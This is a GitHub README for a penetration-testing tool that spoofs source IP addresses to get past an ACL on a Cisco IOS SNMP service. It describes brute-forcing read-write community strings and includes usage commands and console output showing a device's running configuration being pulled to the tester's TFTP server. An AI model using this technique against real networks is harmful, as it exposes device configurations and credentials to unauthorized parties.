Skip to content


Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time


cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device.

Typically IP spoofing has limited use during real attacks outside DoS. Any TCP service cannot complete the inital handshake. UDP packets are easier to spoof but the return packet is often sent to the wrong address, which makes it difficult to collect any information returned.

However if an attacker can guess the snmp rw community string and a valid source address an attacker can set SNMP MiBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device.

This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to subsequently or randomly go through a range of source addresses.

To specifying range of source IP addresses to check an initial source address and IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address.

For example, if a source address of is supplied with a IP mask of then the script will explore the address from to

The bits set do not have to be sequential like a subnet mask. For example the mask is valid and will explore the ranges 10.0,128.0-1.0-255.

When checking a range of IP addresses randomly or sequentially it requires you to enter the path to the root of the tftp directory. The script will check this directory to see if the file has been successfully transferred.

This tool was written to target Cisco layer 3 switches during pentests, though it may have other users. It works well against these devices because:

  1. layer 3 switches rarely have reverse path verification configured in the author's experience
  2. there are no routers or other devices which may be able to detect that IP spoofing is occurring.

Though I hope that users will find other interesting uses for this script and its source code.


In this example I will take a simple IOS device with an access list protecting a SNMP service using the community string 'cisco'

access-list 10 permit
snmp-server community cisco rw 10

One IOS device's IP address is

The pentester has an IP address and has started a TFTP server.

If the tester knows all of this they use the one shot single mode to grab the device's config file. E.g.

./ single cisco

If the tester doesn't know the details of they could try and guess. Lets say the tester has done some recon and has figured out that all internal addresses are the range.

./ seqmask private /tftproot/

This command will search through all the /24, the tester hopes they can save some time by assuming a whole subnet will be allowed access rather than just one IP address.

root@Athena:/home/notroot/cisco-snmp-slap# ./ seqmask cisco /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald,

WARNING: No route found for IPv6 destination :: (no default route?)
Community String:   cisco
TFTP Server IP  :
Source IP:
Source Mask:
Destination IP:
TFTP Root Path:     /tftproot//cisco-config.txt
< ... cut for brevity ... >

You should notice that the program exists and announces success several IP addresses after it enters the range. This because it is not possible to determine which source address was successful, but determines one of the requests was successful after the config file turns up in the tftproot. Given you've just nabbed the running config you can now find out the details of the ACL yourself.

Rather than specifying a single community string you can also give a list which should be used. The mode names are the same except have a '_l' suffix.

For example to repeat the same attack using a list of community strings in in list.txt the following arguments should be used.

root@Athena:/home/notroot/cisco-snmp-slap# ./ seqmask_l list.txt /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald,

WARNING: No route found for IPv6 destination :: (no default route?)
Community File: list.txt
TFTP Server IP  :
Source IP:
Source Mask:
Destination IP:
TFTP Root Path: /tftproot//cisco-config.txt
community strings loaded:  ['private\n', 'cisco\n', 'public\n'] /  private /  cisco /  public /  private /  cisco /  public /  private /  cisco /  public /  private /  cisco /  public

Now each IP address is checked with each community string in list.txt.


As programming languages go Python is a simple language, easy to read and write and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC Github.

But if you need assistance you can contact me at I'll do my best to help you but you should be aware I am not a full time developer (which should be obvious from my code!) and may not immediately have time get to your query.


  • 0.1 Inital version
  • 0.2 Added random and sequental modes and source address masks
  • 0.3 added community string file list feature, first public version
  • 0.3.1 now uses os.sep so that paths work correctly on Windows


No description, website, or topics provided.







No releases published


No packages published